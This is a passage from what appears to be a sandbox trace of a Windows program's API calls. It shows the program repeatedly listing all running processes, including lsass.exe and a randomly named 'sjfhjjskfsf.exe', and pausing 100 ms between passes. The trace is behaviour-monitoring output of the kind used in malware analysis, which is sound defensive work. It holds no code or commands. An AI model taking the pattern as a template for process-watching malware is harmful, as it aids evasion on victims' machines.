hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.880] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0216.880] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.880] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.881] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.881] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.881] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.882] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0216.882] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0216.882] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0216.883] Process32NextW (in: hSnapshot=0x198, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0216.883] Sleep (dwMilliseconds=0x64) [0216.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0217.000] Process32FirstW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.000] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.000] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.001] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.001] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.001] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.002] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.002] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.002] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.003] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0217.003] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.003] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.004] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.004] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.004] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.005] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.005] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.005] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.006] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0217.006] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.006] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.007] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.007] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.007] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.008] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0217.008] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0217.008] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0217.009] Process32NextW (in: hSnapshot=0x19c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0217.009] Sleep (dwMilliseconds=0x64) [0217.136] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0 [0217.138] Process32FirstW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.139] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.139] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.139] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.140] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.140] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.140] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.141] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.141] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.141] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0217.142] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.142] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.142] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.143] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.143] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.143] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.144] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.144] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.145] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0217.145] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.145] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.146] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.146] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.146] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.147] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0217.147] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0217.147] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0217.148] Process32NextW (in: hSnapshot=0x1a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0217.148] Sleep (dwMilliseconds=0x64) [0217.276] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a4 [0217.278] Process32FirstW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.278] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.278] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.279] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.279] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.279] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.280] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.280] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.280] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.281] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0217.281] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.281] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.282] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.282] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.282] Process32NextW (in: hSnapshot=0x1a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, 